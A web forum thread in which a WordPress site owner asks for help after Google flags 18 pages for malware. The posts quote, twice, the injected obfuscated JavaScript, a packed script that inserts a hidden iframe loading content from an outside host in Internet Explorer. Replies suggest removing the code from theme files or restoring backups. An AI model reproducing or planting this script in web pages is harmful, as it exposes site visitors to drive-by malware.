Need help on WP self-hosted site's malware infection - Java

csyhomme

Regular Member
Joined
Oct 6, 2010
Messages
242
Reaction score
23
Any one got this issue ? Just yesterday google detected one of my site ( self-hosted WP ) for malware and got 18 pages which has this on :

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c
)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){retu
rn'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\
\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!
a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\'
;0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3(
"p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u(
"9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|M
akeFrameEx|element|yahoo_api|height|width|display|none|body|
getElementById|function|createElement|iframe|appendChild|src
|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
|userAgent|1000|hngfxhgfx|navigator|ai|showthread|php|722417
32'.split('|'),0,{}))
</script>

Would really like to know what I should do next, trying to grab an idea on how to clean it, any help is appreciated. Remove the code from those 18 pages will do ?? or there is more than that ?

Thanks in advance
 
how many pages do you have in total? look for that code and delete it.

login your dashboard. go to appearance. then click editor. most likely you will find that code in either page.php or single.php or index.php
 
Any one got this issue ? Just yesterday google detected one of my site ( self-hosted WP ) for malware and got 18 pages which has this on :

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c
)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){retu
rn'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\
\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!
a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\'
;0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3(
"p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u(
"9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|M
akeFrameEx|element|yahoo_api|height|width|display|none|body|
getElementById|function|createElement|iframe|appendChild|src
|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
|userAgent|1000|hngfxhgfx|navigator|ai|showthread|php|722417
32'.split('|'),0,{}))
</script>

Would really like to know what I should do next, trying to grab an idea on how to clean it, any help is appreciated. Remove the code from those 18 pages will do ?? or there is more than that ?

Thanks in advance


I received this code on my wp site, totally messed up my laptop. It really pissed me off, I posted a thread about it and no one was helpful.

I spoke to my host provider and they removed all infected files and replaces them with the backups they had stored.
 
There are 85 pages on the site, and try to find the code but with no success, I have back up but I am afraid that it will effect my original contents from last update. And today, there are more sites got infected, all of them are WP sites .. damn ... anyone ?
 
Problem solved, better secure all your WP site better this time !
 
Was it that he didnt update or he installed some bad plugins/themes?
 
Back
Top